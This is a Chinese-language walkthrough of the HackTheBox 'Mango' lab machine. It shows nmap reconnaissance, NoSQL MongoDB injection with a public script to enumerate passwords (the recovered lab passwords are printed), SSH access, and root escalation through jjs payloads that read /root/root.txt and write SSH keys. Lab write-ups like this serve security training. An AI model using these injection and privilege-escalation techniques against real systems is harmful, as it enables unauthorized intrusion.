这篇文章主要讲解了“HTB Mango的渗透测试实例”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“HTB Mango的渗透测试实例”吧!
前言本次演练使用kali系统按照渗透测试的过程进行操作,通过前期的信息收集与普通注入不能获取到有用的信息,通过谷歌诸侯知道,可以利用 Nosql-MongoDB-injection爬取账号与密码,使用ssh远程连接获取user.txt最终通过提权获取root.txt。
一、信息收集1、靶机ipip地址为:10.129.1.219

2、靶机端口与服务nmap -sV -A -O 10.129.1.219
获取到开放端口与版本信息并且获得了正在使用的域名信息PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))3、网站信息收集查看80与443端口

发现443端口是一个类似于谷歌的搜索界面通过证书获得一些信息

二、漏洞探测与利用Nosql-MongoDB-injection将重点放在80端口,这个端口是一个登录界面,经过尝试通过普通的sql注入无法爬取到有用的信息
通过谷歌发现存在Nosql-MongoDB-injection可以利用脚本进行注入尝试获取账号与密码
链接:https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
python3 nosqli-user-pass-enum.py -u -up username -pp password -ep username -op login:login,submit:submit
python3 nosqli-user-pass-enum.py -u -up username -pp password -ep password -op login:login,submit:submit

用户:admin 密码:t9KcS3>!0B#2
用户:mango 密码:h4mXK8RhU~f{]f5H使用获得的账号密码进行登录
无论使用哪一个都会跳转到这个界面

通过ssh进行远程连接 并跳转到admin用户,否则无法查看到admin文件夹下的user.txt


三、提权获取交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'使用LinEnum.sh查看是否存在可利用信息
最终根据提示找到了jjs可以利用jjs进行提权

使用GTFOBins 查看可利用脚本
链接:https://gtfobins.github.io/

(1) 通过运行文件读取命令直接获得root.txtvar BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }
(2) 通过jjs上传我们自己生成的ssh公钥然后使用我们自己的私钥进行连接获取root权限
ssh-keygen
完善脚本信息


echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("./file_to_write");
fw.write("DATA");
fw.close();' | jjs
郑重声明:本文版权归原作者所有,转载文章仅为传播更多信息之目的,如作者信息标记有误,请第一时间联系我们修改或删除,多谢。